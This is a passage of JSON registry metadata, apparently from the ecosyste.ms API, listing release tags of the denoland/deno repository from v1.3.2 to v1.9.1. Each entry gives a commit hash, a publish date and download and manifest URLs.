.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1